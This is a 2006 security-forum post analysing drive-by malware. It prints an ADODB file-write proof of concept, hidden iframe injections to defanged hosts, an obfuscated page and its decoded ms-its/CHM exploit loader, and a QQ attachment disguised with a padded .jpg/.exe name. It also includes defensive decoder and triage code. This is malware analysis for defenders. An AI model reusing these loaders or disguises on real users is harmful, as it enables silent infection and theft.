Rising Kaka Security Forum (瑞星卡卡安全论坛)

【火影】我爱罗 - 2006-5-2 4:58:00
Disguised as a GIF file; it downloads and runs 1.js.
1.js is actually a CHM file, which drops and runs an .exe. Kaspersky detects it as Trojan-Downloader.Win32.Delf.aet; Rising detects it as Trojan.DL.Small.hm.

File:  1.js 
Status:  INFECTED/MALWARE 
MD5  617449ed78325096128e604f1e9f9d30 
Packers detected:  -
Scanner results 
AntiVir  Found Heuristic/Trojan.Downloader (probable variant) 
ArcaVir  Found Trojan.Downloader.Delf.Aet 
Avast  Found nothing
AVG Antivirus  Found nothing
BitDefender  Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET 
ClamAV  Found Exploit.HTML.ObjCode-2 
Dr.Web  Found Exploit.CodeBase, Trojan.DownLoader.6966 
F-Prot Antivirus  Found HTML/ObjCode@expl 
Fortinet  Found nothing
Kaspersky Anti-Virus  Found Trojan-Downloader.Win32.Delf.aet 
NOD32  Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET 
Norman Virus Control  Found nothing
UNA  Found nothing
VirusBuster  Found nothing
VBA32  Found Trojan-Downloader.Win32.Delf.aet 

I analyzed and annotated the malicious file young.gif from the thread 发现一个使用技术升级、下载灰鸽子的网站 ("Found a site using upgraded techniques to download Gray Pigeon") and learned a lot from it. One thing was the use of ADODB to write a file to disk.

The code below was cut out of young.gif and modified; it writes the file c:\boot.hta.


--------------------------------------------------------------------------------

<html>
<head></head>
<body>
<SCRIPT language=JScript>
try
{
var strHello = "hello";
// write a file using ADODB.Recordset
Rfuc1k1S=new ActiveXObject("ADODB.Recordset");
Rfuc1k1S.Fields.Append("love", 200, 3000); // type 200 = adVarChar, size 3000
mike=1; // filler statement, no effect
Rfuc1k1S.Open();
mike=1;
Rfuc1k1S.AddNew();
mike=1;
Rfuc1k1S.Fields("love").Value = strHello; // the record holds the file content
}
catch(e)
{}
Rfuc1k1S.Update();

try
{
Rfuc1k1S.Save("c:\\boot.hta" ,0); // save as c:\boot.hta (format 0 = adPersistADTG)
}
catch(e)
{}
</SCRIPT>
</body>
</html>

--------------------------------------------------------------------------------

Copy and paste it into Notepad, save it as an .htm file, and double-click it to run.

Then check whether c:\boot.hta has appeared.

Summary: the site's home page had malicious code inserted:
<iframe src='hxxp://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='hxxp://djloveqq.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>
Version 2: analyzed young.gif and confirmed that young.css is Gray Pigeon (灰鸽子).

Received a virus-carrying email today. It resembles the virus email received at the end of 2005 (see: 收到带病毒的电子邮件.... ), but has been refreshed somewhat.



Subject: How have you been? Can't get in touch with you
From: "zxc338855" zxc338855@163.com
The email body reads:
Boss, why can't I ever find you lately? Where on earth did you run off to! Your phone is always switched off when I call! You don't reply when I text you! I guess you haven't read my emails either! If you see this message, give me a call! I need you for something! By the way, did you change your QQ? Or did it get hacked! The person on your old QQ keeps cursing at me! It's really disgusting! I suspect it isn't you! If your QQ was hacked I still have a few QQ numbers I can give you! But you have to buy dinner! That's it for now, be sure to get in touch when you have time! Don't forget Boss, why can't I ever find you lately? Where on earth did you run off to! Your phone is always switched off when I call! You don't reply when I text you! I guess you haven't read my emails either! If you see this message, give me a call! I need you for something! By the way, did you change your QQ? Or did it get hacked! The person on your old QQ keeps cursing at me! It's really disgusting! I suspect it isn't you! If your QQ was hacked I still have a few QQ numbers I can give you! But you have to buy dinner! That's it for now, be sure to get in touch when you have time! Don't forget

The email body uses an <IFRAME> to pull in the virus-downloading page hxxp://2008.***e2.7868.net/service/bj/a.htm.

The content of hxxp://2008.***e2.7868.net/service/bj/a.htm is:




--------------------------------------------------------------------------------



<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=TDSJQU>wbs!Xpset>#&4Dcpez!podpoufyunfov&4E&33sfuvso!gbmtf&33!p","oesbhtubsu&4E&33sfuvso!gbmtf&33!potfmfdutubsu!&4E&33sfuvso!gb","mtf&33!potfmfdu&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!po","dpqz&4E&33epdvnfou&3Ftfmfdujpo&3Ffnquz&39&3:&33!pocfgpsfdpqz&","4E&33sfuvso!gbmtf&33!ponpvtfvq&4E&33epdvnfou&3Ftfmfdujpo&3Ffn","quz&39&3:&33&4F&4Doptdsjqu&4F&4Djgsbnf!tsd&4E&3B&4F&4D&3Gjgsb","nf&4F&4D&3Goptdsjqu&4F&1E&1B&4Dufyubsfb!je&4E&33dpef&33!tuzmf","&4E&33ejtqmbz&4Bopof&4C&33&4F&1E&1B&4Dpckfdu!ebub&4E&33&37&34","21:&4Ct&3Ejut&4Bniunm&4Bgjmf&4B&3G&3Gd&4B&6Dgpp&3Fniu&32&35&8","Cqbui&8E&3Gb&3Fdin&4B&4B&3Gb&3Fiun&33!uzqf&4E&33ufyu&3Gy&3Etd","sjqumfu&33&4F&1E&1B&4D&3Gpckfdu&4F&1E&1B&4D&3Gufyubsfb&4F&1E&","1B&4Dtdsjqu!mbohvbhf&4E&33kbwbtdsjqu&33&4F&1E&1Bepdvnfou&3Fxs","juf&39dpef&3Fwbmvf&3Fsfqmbdf&39&3G&6D&35&8Cqbui&8E&3Gh&3Dmpdb","ujpo&3Fisfg&3Ftvctusjoh&391&3Dmpdbujpo&3Fisfg&3FjoefyPg&39&38","b&3Fiun&38&3:&3:&3:&3:&4C&1E&1B&4D&3Gtdsjqu&4F&1E&1B#<epdvnfo","u/xsjuf)voftdbqf)Xpset**=0TDSJQU> "];

// Decoder: every character was stored as its code + 1; a code of 1 stands for "!"
// (so the encoded text never contains '"'), and a code of 2 means "emit the next
// character unchanged".
function psw(st){
  var varS="";
  var i;
  for(var a=0;a<st.length;a++){
    i = st.charCodeAt(a);
    if (i==1)
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
    }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
}

var num=16; // number of chunks in HtmlStrings

function S(){
  // decode each chunk and write it straight into the document
  for(var i=0;i<num;i++)
    document.write(psw(HtmlStrings[i]));
}

S();

// -->

</SCRIPT>

--------------------------------------------------------------------------------

It uses a custom encryption function to encrypt the page.

The decrypted code is:




--------------------------------------------------------------------------------



<SCRIPT>var Words="%3Cbody oncontextmenu%3D%22return false%22 ondragstart%3D%22return false%22 onselectstart %3D%22return false%22 onselect%3D%22document%2Eselection%2Eempty%28%29%22 oncopy%3D%22document%2Eselection%2Eempty%28%29%22 onbeforecopy%3D%22return false%22 onmouseup%3D%22document%2Eselection%2Eempty%28%29%22%3E%3Cnoscript%3E%3Ciframe src%3D%2A%3E%3C%2Fiframe%3E%3C%2Fnoscript%3E%0D%0A%3Ctextarea id%3D%22code%22 style%3D%22display%3Anone%3B%22%3E%0D%0A%3Cobject data%3D%22%26%23109%3Bs%2Dits%3Amhtml%3Afile%3A%2F%2Fc%3A%5Cfoo%2Emht%21%24%7Bpath%7D%2Fa%2Echm%3A%3A%2Fa%2Ehtm%22 type%3D%22text%2Fx%2Dscriptlet%22%3E%0D%0A%3C%2Fobject%3E%0D%0A%3C%2Ftextarea%3E%0D%0A%3Cscript language%3D%22javascript%22%3E%0D%0Adocument%2Ewrite%28code%2Evalue%2Ereplace%28%2F%5C%24%7Bpath%7D%2Fg%2Clocation%2Ehref%2Esubstring%280%2Clocation%2Ehref%2EindexOf%28%27a%2Ehtm%27%29%29%29%29%3B%0D%0A%3C%2Fscript%3E%0D%0A";document.write(unescape(Words))</SCRIPT>

--------------------------------------------------------------------------------

After unescape, the code is:




--------------------------------------------------------------------------------



<body oncontextmenu="return false" ondragstart="return false" onselectstart ="return false" onselect="document.selection.empty()" oncopy="document.selection.empty()" onbeforecopy="return false" onmouseup="document.selection.empty()"><noscript><iframe src=*></iframe></noscript>

<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:\foo.mht!${path}/a.chm::/a.htm" type="text/x-scriptlet">
</object>
</textarea>

<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('a.htm'))));
</script>




--------------------------------------------------------------------------------





This page downloads and runs a.chm.

a.chm drops and runs a.htm and a.exe. Kaspersky detects them as Exploit.HTML.CodeBaseExec and Trojan-Dropper.Win32.Pakes; Rising detects them as Exploit.HTML.CodeExec and Trojan.PcGhost.c.
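As an added example (not code from the post or from a.htm), here is an analyst-side decoder for the shift-by-one scheme used in a.htm, followed by a marker scan of the decoded HTML for the loader techniques shown on this page (ms-its/mhtml, .chm::/ paths, x-scriptlet objects, ADODB writes, zero-size iframes). The encoded sample is constructed for the example; the marker list is my own choice.

```javascript
// Inverse of psw() above: each character is stored as code+1; \x01 stands for
// "!" (so the encoded text never contains '"', which would end the string
// literal) and \x02 means "take the next character literally, unshifted".
function decodeShift(st) {
  let out = "";
  for (let a = 0; a < st.length; a++) {
    const i = st.charCodeAt(a);
    if (i === 1) {
      out += "!";
    } else if (i === 2) {
      a++;
      out += st.charAt(a);
    } else {
      out += String.fromCharCode(i - 1);
    }
  }
  return out;
}

// Markers for the techniques this page documents; each hit names the technique.
const MARKERS = [
  ["ms-its / mhtml handler (loads a CHM)", /\bms-its:|\bmhtml:/i],
  ["path into a CHM (file.chm::/page)", /\.chm::\//i],
  ["text/x-scriptlet object", /text\/x-scriptlet/i],
  ["ADODB.Recordset/Stream (writes files from script)", /ADODB\.(Recordset|Stream)/i],
  ["zero-size iframe", /<iframe[^>]*\b(width|height)=['"]?0\b/i],
  ["document.write(unescape(...)) layer", /document\.write\s*\(\s*unescape\s*\(/i],
];

function flagMarkers(html) {
  return MARKERS.filter(([, re]) => re.test(html)).map(([name]) => name);
}

// Constructed sample (not from the real a.htm): the encoded form of
//   <object data="ms-its:a.chm::/a.htm" type="text/x-scriptlet">Hi!Z
// where "!" is stored as \x01 and "Z" goes through the \x02 escape.
const SAMPLE = "=pckfdu!ebub>#nt.jut;b/din;;0b/iun#!uzqf>#ufyu0y.tdsjqumfu#?Ij\x01\x02Z";

function analyze(encoded) {
  const decoded = decodeShift(encoded);
  return { decoded, flags: flagMarkers(decoded) };
}

const REPORT = analyze(SAMPLE);
console.log(REPORT.decoded);
console.log("flags:", REPORT.flags.join("; "));
```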

The file sent over QQ is 元旦快乐.ZIP ("Happy New Year.zip"); the file inside it is:




--------------------------------------------------------------------------------



元旦快乐.jpg                                                                                                                                .exe




--------------------------------------------------------------------------------



The file icon is a girl's avatar, and a long run of spaces has been inserted between the ".jpg" in the file name and the real .exe extension, so it is easily mistaken for a JPG image file.

Rising detects it as Worm.QQ.TopFox.aq.

Kaspersky 5 does not alert when the file is received in QQ; only a manual scan or extracting the archive triggers the detection: Trojan.Win32.VB.aha.
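As an added example (not from the post), a small attachment triage routine for the two disguises described on this page: a CHM delivered under a .js/.gif name, and an .exe whose real extension is pushed out of view by padding spaces. The magic-number table, the list of executable extensions and the sample file heads are my own constructions.

```javascript
// Leading-byte signatures (assumption: only these few types are modelled).
const MAGIC = [
  ["chm", "ITSF"],
  ["exe", "MZ"],
  ["gif", "GIF8"],
  ["jpg", "\xff\xd8\xff"],
  ["zip", "PK\x03\x04"],
];

// Identify a file by its first bytes (a Buffer or Uint8Array), not by its name.
function detectType(bytes) {
  const head = String.fromCharCode(...bytes.subarray(0, 8));
  const hit = MAGIC.find(([, sig]) => head.startsWith(sig));
  return hit ? hit[0] : "unknown";
}

// Padded double extension: "<name>.jpg<spaces>.exe". \s already covers the
// full-width space U+3000, which is listed explicitly for readability.
function triageName(name) {
  const findings = [];
  const m = name.match(/\.([a-z0-9]+)[\s\u3000]{2,}\.(exe|scr|com|pif|bat|cmd|chm|hta)$/i);
  if (m) {
    findings.push(`padded double extension: looks like .${m[1].toLowerCase()}, runs as .${m[2].toLowerCase()}`);
  }
  return findings;
}

// Combine the name check with a content-vs-extension check.
function triage(name, bytes) {
  const findings = triageName(name);
  const real = detectType(bytes);
  const claimed = (name.match(/\.([a-z0-9]+)$/i) || ["", ""])[1].toLowerCase();
  const jpegAlias = real === "jpg" && claimed === "jpeg";
  if (real !== "unknown" && claimed !== real && !jpegAlias) {
    findings.push(`content is ${real} but name claims .${claimed || "(none)"}`);
  }
  return findings;
}

// Constructed samples (not real files): a CHM served as 1.js, a PE whose name
// hides ".exe" behind a run of spaces like the QQ attachment, and a clean JPEG.
const SAMPLES = [
  ["1.js", Buffer.from("ITSF\x03\x00\x00\x00", "latin1")],
  ["元旦快乐.jpg" + " ".repeat(40) + ".exe", Buffer.from("MZ\x90\x00", "latin1")],
  ["photo.jpg", Buffer.from("\xff\xd8\xff\xe0", "latin1")],
];
for (const [name, head] of SAMPLES) console.log(JSON.stringify(name.trim()), triage(name, head));
```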

File:  元旦快乐.zip 
Status:  INFECTED/MALWARE 
MD5  d7958247cf08ab13a22c0b137e8c9cca 
Packers detected:  Analyzing...
Scanner results 
AntiVir  Found Trojan/TopFox.A 
ArcaVir  Found Trojan.Vb.Aha 
Avast  Found Win32:Trojan-gen. {Other} 
AVG Antivirus  Found Generic.MHL 
BitDefender  Found Trojan.Vb.AHA 
ClamAV  Found nothing
Dr.Web  Found Trojan.Topfox 
F-Prot Antivirus  Found nothing
Fortinet  Found W32/QQLove.A-pws 
Kaspersky Anti-Virus  Found Trojan.Win32.VB.aha 
NOD32  Found probably unknown NewHeur_PE (probable variant) 
Norman Virus Control  Found W32/VBTroj.TT 
UNA  Found nothing
VirusBuster  Found Trojan.VB.EDK 
VBA32  Found Trojan.Win32.VB.aha 
This is a report processed by VirusTotal on 04/03/2006 at 11:59:44 (CET) after scanning the file "__25968" file.
Antivirus Version Update Result
AntiVir 6.34.0.14 04.03.2006 TR/TopFox.A
Avast 4.6.695.0 04.03.2006 Win32:Trojan-gen. {Other}
AVG 386 03.31.2006 Generic.MHL
Avira 6.34.0.54 04.03.2006 TR/TopFox.A
BitDefender 7.2 04.03.2006 Trojan.Vb.AHA
CAT-QuickHeal 8.00 03.31.2006 Trojan.VB.aha
ClamAV devel-20060202 04.03.2006 no virus found
DrWeb 4.33 04.03.2006 Trojan.Topfox
eTrust-InoculateIT 23.71.118 04.02.2006 Win32/SillyDL.21652!Trojan
eTrust-Vet 12.4.2146 04.03.2006 no virus found
Ewido 3.5 04.03.2006 Trojan.VB.aha
Fortinet 2.71.0.0 04.03.2006 W32/QQLove.A-pws
F-Prot 3.16c 03.30.2006 no virus found
Ikarus 0.2.59.0 04.01.2006 Win32.HLLW.Imkill
Kaspersky 4.0.2.24 04.03.2006 Trojan.Win32.VB.aha
McAfee 4731 03.31.2006 Generic Malware.a!zip
NOD32v2 1.1467 04.02.2006 probably unknown NewHeur_PE virus
Norman 5.70.10 03.31.2006 W32/VBTroj.TT
Panda 9.0.0.4 04.02.2006 Trj/Qeds.F
Sophos 4.04.0 04.03.2006 no virus found
Symantec 8.0 04.03.2006 Trojan Horse
TheHacker 5.9.7.124 04.03.2006 W32/Generic!zip-dobleextension
UNA 1.83 03.30.2006 Trojan.Win32.VB
VBA32 3.10.5 04.03.2006 Trojan.Win32.VB.aha

